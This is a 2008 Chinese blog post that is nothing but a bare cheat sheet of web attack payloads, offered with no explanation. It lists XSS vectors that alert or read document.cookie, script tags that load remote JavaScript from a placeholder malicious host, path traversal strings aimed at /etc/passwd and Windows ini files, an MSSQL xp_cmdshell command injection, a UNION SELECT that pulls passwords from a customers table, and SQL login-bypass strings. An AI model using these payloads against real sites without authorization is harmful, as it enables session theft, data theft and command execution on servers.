XSS测试语法大全

以下是引用片段:
<script>alert(document.cookie)</script>
  =’><script>alert(document.cookie)</script>
  <script>alert(document.cookie)</script>
  <script>alert(vulnerable)</script>
  %3Cscript%3Ealert(’XSS’)%3C/script%3E
  <script>alert(’XSS’)</script>
  <img src="javascript:alert(’XSS’)">
  %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
  %22%3cscript%3ealert(%22xss%22)%3c/script%3e
  %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
  %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
  <script>alert(’Vulnerable’);</script>
  <script>alert(’Vulnerable’)</script>
  ?sql_debug=1
  a%5c.aspx
  a.jsp/<script>alert(’Vulnerable’)</script>
  a?<script>alert(’Vulnerable’)</script>
  "><script>alert(’Vulnerable’)</script>
  ’;exec%20master..xp_cmdshell%20’dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’--&&
  %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
  %3Cscript%3Ealert(document. domain);%3C/script%3E&
  %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
  http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
  ..\..\..\..\..\..\..\..\windows\system.ini
  \..\..\..\..\..\..\..\..\windows\system.ini
  ’’;!--"<XSS>=&{()}
  <IMG SRC="javascript:alert(’XSS’);">
  <IMG SRC=javascript:alert(’XSS’)>
  <IMG SRC=JaVaScRiPt:alert(’XSS’)>
  <IMG SRC=JaVaScRiPt:alert("XSS")>
  <IMG SRC=javascript:alert(’XSS’)>
  <IMG SRC=javascript:alert(’XSS’)>
  <IMG SRC=javascript:alert('XSS')>
  <IMG SRC="javascript:alert(’XSS’);">
  "<IMG SRC=java\0script:alert(\"XSS\")>";’ > out
  <IMG SRC=" javascript:alert(’XSS’);">
  <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  <BODY BACKGROUND="javascript:alert(’XSS’)">
  <BODY ONLOAD=alert(’XSS’)>
  <IMG DYNSRC="javascript:alert(’XSS’)">
  <IMG LOWSRC="javascript:alert(’XSS’)">
  <BGSOUND SRC="javascript:alert(’XSS’);">
  <br size="&{alert(’XSS’)}">
  <LAYER SRC="http://惡意網址/a.js"></layer>
  <LINK REL="stylesheet" HREF="javascript:alert(’XSS’);">
  <IMG SRC=’vbscript:msgbox("XSS")’>
  <IMG SRC="mocha:[code]">
  <IMG SRC="livescript:[code]">
  <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(’XSS’);">
  <IFRAME SRC=javascript:alert(’XSS’)></IFRAME>
  <FRAMESET><FRAME SRC=javascript:alert(’XSS’)></FRAME></FRAMESET>
  <TABLE BACKGROUND="javascript:alert(’XSS’)">
  <DIV STYLE="background-image: url(javascript:alert(’XSS’))">
  <DIV STYLE="behaviour: url(’http://惡意網址/exploit.html’);">
  <DIV STYLE="width: expression(alert(’XSS’));">
  <STYLE>@im\port’\ja\vasc\ript:alert("XSS")’;</STYLE>
  <IMG STYLE=’xss:expre\ssion(alert("XSS"))’>
  <STYLE TYPE="text/javascript">alert(’XSS’);</STYLE>
  <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert(’XSS’)");}</STYLE><A CLASS=XSS></A>
  <STYLE type="text/css">BODY{background:url("javascript:alert(’XSS’)")}</STYLE>
  <BASE HREF="javascript:alert(’XSS’);//">
  getURL("javascript:alert(’XSS’)")
  a="get";b="URL";c="javascript:";d="alert(’XSS’);";eval(a+b+c+d);
  <XML SRC="javascript:alert(’XSS’);">
  "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(’XSS’);}</SCRIPT><"
  <SCRIPT SRC="http://惡意網址/xss.jpg"></SCRIPT>
  <IMG SRC="javascript:alert(’XSS’)"
  <!--#exec cmd="/bin/echo ’<SCRIPT SRC’"--><!--#exec cmd="/bin/echo ’=http://惡意網址/a.js></SCRIPT>’"-->
  <IMG SRC="http://惡意網址/somecommand.php?somevariables=maliciouscode">
  <SCRIPT a=">" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT =">" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT a=">" ’’ SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT "a=’>’" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://惡意網址/a.js"></SCRIPT>
  <A HREF=http://惡意網址/>link</A>
  admin’--
  ’ or 0=0 --
  " or 0=0 --
  or 0=0 --
  ’ or 0=0 #
  " or 0=0 #
  or 0=0 #
  ’ or ’x’=’x
  " or "x"="x
  ’) or (’x’=’x
  ’ or 1=1--
  " or 1=1--
  or 1=1--
  ’ or a=a--
  " or "a"="a
  ’) or (’a’=’a
  ") or ("a"="a
  hi" or "a"="a
  hi" or 1=1 --
  hi’ or 1=1 --
  hi’ or ’a’=’a
  hi’) or (’a’=’a
  hi") or ("a"="aXSS測試語法><script>alert(document.cookie)</script>
posted on 2008-11-22 00:21  一江水  阅读(1056)  评论(0编辑  收藏  举报